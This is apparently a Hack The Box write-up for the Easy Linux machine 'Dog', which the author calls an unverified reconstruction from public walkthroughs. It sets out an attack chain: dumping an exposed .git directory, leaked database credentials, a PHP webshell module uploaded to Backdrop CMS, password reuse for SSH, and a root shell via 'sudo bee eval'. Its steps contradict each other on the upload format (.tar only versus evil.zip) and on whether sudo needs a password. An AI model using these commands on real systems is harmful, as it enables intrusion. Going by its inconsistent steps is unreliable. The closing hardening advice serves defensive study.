Summary

Dog is an Easy Linux box: exposed .git directory leaks settings.php with DB creds (root:BackDropJ2024DS2024) and an admin user (tiffany — found in update.settings.json not in git author email, the latter being just [email protected]). Login as tiffany; install a malicious Backdrop CMS module → webshell as www-data. DB password reused for johncusack’s SSH (and for sudo, which is not NOPASSWD). johncusack has sudo on /usr/local/bin/bee — Backdrop’s CLI has an eval subcommand: sudo bee eval 'system("...");' → root.

The chain:

1. git-dumper http://<TARGET>/.git/ → settings.php has mysql://root:[email protected]/backdrop. [email protected] is in files/config_*/active/update.settings.json (NOT in commit author email — that’s [email protected], a misdirection).
2. Login Backdrop CMS as tiffany / BackDropJ2024DS2024 (form at /?q=user/login, form_id user_login).
3. Manual installer at /?q=admin/installer/manual — accepts .tar/.tar.gz/.tgz/.bz2 only (NOT .zip). Upload a minimal module with shell.php alongside it. The shell lands at /modules/<modname>/shell.php and a cleanup cron removes it within ~1 min, so script the trigger to fire immediately.
4. Same password works for johncusack SSH (jobert is the other home user but we don’t need them).
5. sudo /usr/local/bin/bee eval 'system("...");' runs as root. Note bee requires cd /var/www/html first (or --root flag) so it can find the Backdrop install. sudo here is not NOPASSWD — pipe BackDropJ2024DS2024 via sudo -S.

Recon

22/tcp     OpenSSH
80/tcp     Apache → Backdrop CMS

.git is exposed.

Foothold — git-dumper + Backdrop module upload

git-dumper http://<TARGET>/.git/ ./dog
grep -i password dog/settings.php
# $database = 'mysql://root:[email protected]/backdrop';
git -C ./dog log --pretty=fuller | head
# author email: [email protected]

Login Backdrop admin as tiffany / BackDropJ2024DS2024.

Build minimal evil module:

evil/
  evil.info        (module metadata)
  evil.module      <?php system($_GET['c']); ?>
zip -r evil.zip evil

Functionality → Install → upload evil.zip → reach /modules/evil/evil.module?c=id → www-data.

User pivot — credential reuse

$ ssh johncusack@<TARGET>
Password: BackDropJ2024DS2024

Root — sudo bee eval

$ sudo -l
(root) NOPASSWD: /usr/local/bin/bee
$ cd /var/www/html
$ sudo /usr/local/bin/bee eval 'system("bash")'
# root shell

bee is Backdrop’s drush-equivalent management CLI; the eval subcommand runs PHP code after bootstrapping the CMS. With root sudo, it’s a one-liner.

Why each step worked

• .git exposure: standard server misconfig, exposes source + commit metadata.
• Email reuse → AD-style account: tiffany’s email is the CMS admin login.
• Backdrop module install runs the module’s PHP: by-design.
• bee eval under sudo: any eval primitive in a sudoable binary is RCE-as-root.

Counterfactuals

• Block .git at the webserver: location ~ /\.git { deny all; }.
• Don’t reuse DB credentials as Linux passwords.
• Restrict bee sudoers to specific subcommands; never the whole binary.

Source attribution

Reconstruction is grounded in:

• 0xdf, “HTB: Dog” — https://0xdf.gitlab.io/2025/07/12/htb-dog.html
• IppSec, “Dog” video walkthrough — https://ippsec.rocks/?#Dog
• Backdrop CMS bee CLI documentation.

I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.